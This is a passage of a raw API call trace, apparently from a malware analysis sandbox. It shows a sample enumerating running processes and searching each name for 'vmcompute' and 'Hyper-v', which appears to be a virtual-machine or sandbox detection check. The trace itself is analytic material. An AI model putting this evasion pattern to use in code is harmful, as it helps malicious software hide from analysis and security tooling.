lpMultiByteStr=0x357f500, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0102.287] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0102.287] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="vmcompute") returned 0x0 [0102.288] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0102.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.289] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f760 [0102.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357f760, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0102.289] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0102.289] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="vmcompute") returned 0x0 [0102.289] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0102.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.290] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357ea78 [0102.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x357ea78, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0102.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0102.291] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="vmcompute") returned 0x0 [0102.291] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.292] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570428 [0102.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570428, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.292] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0102.292] StrStrIA (lpFirst="conhost.exe", lpSrch="vmcompute") returned 0x0 [0102.292] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.293] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35705f0 [0102.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35705f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0102.293] StrStrIA (lpFirst="conhost.exe", lpSrch="vmcompute") returned 0x0 [0102.294] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0102.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.295] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570680 [0102.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3570680, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0102.295] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0102.295] StrStrIA (lpFirst="rxodge.exe", lpSrch="vmcompute") returned 0x0 [0102.295] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.297] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570638 [0102.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3570638, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0102.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0102.297] StrStrIA (lpFirst="sppsvc.exe", lpSrch="vmcompute") returned 0x0 [0102.297] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0102.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.298] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f520 [0102.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357f520, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0102.298] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0102.298] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="vmcompute") returned 0x0 [0102.298] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0102.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.299] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35705a8 [0102.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x35705a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0102.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0102.299] StrStrIA (lpFirst="TiWorker.exe", lpSrch="vmcompute") returned 0x0 [0102.299] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0102.300] CloseHandle (hObject=0x350) returned 1 [0102.300] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0102.375] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.376] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f6a0 [0102.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357f6a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0102.376] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0102.376] StrStrIA (lpFirst="[System Process]", lpSrch="Hyper-v") returned 0x0 [0102.376] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0102.377] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e138 [0102.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e138, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0102.377] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0102.378] StrStrIA (lpFirst="System", lpSrch="Hyper-v") returned 0x0 [0102.378] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.379] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570728 [0102.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3570728, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0102.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0102.379] StrStrIA (lpFirst="smss.exe", lpSrch="Hyper-v") returned 0x0 [0102.379] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.380] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570518 [0102.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3570518, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0102.380] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0102.380] StrStrIA (lpFirst="csrss.exe", lpSrch="Hyper-v") returned 0x0 [0102.380] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.382] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570608 [0102.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3570608, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0102.382] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0102.382] StrStrIA (lpFirst="wininit.exe", lpSrch="Hyper-v") returned 0x0 [0102.382] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.383] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570620 [0102.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3570620, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0102.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0102.383] StrStrIA (lpFirst="csrss.exe", lpSrch="Hyper-v") returned 0x0 [0102.383] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.385] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570698 [0102.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3570698, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0102.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0102.385] StrStrIA (lpFirst="winlogon.exe", lpSrch="Hyper-v") returned 0x0 [0102.385] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.386] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570668 [0102.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3570668, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0102.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0102.386] StrStrIA (lpFirst="services.exe", lpSrch="Hyper-v") returned 0x0 [0102.386] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.387] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35706b0 [0102.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35706b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0102.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0102.387] StrStrIA (lpFirst="lsass.exe", lpSrch="Hyper-v") returned 0x0 [0102.387] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.388] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570560 [0102.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570560, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.389] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.389] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0102.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.390] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3570578 [0102.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570578, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0102.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0102.390] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="Hyper-v") returned 0x0 [0102.390] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0102.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.391] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35706f8 [0102.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35706f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0102.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0102.391] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="Hyper-v") returned 0x0 [0102.391] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.392] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570650 [0102.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570650, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.392] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.392] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0102.393] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e258 [0102.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e258, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0102.393] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0102.393] StrStrIA (lpFirst="dwm.exe", lpSrch="Hyper-v") returned 0x0 [0102.393] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.395] 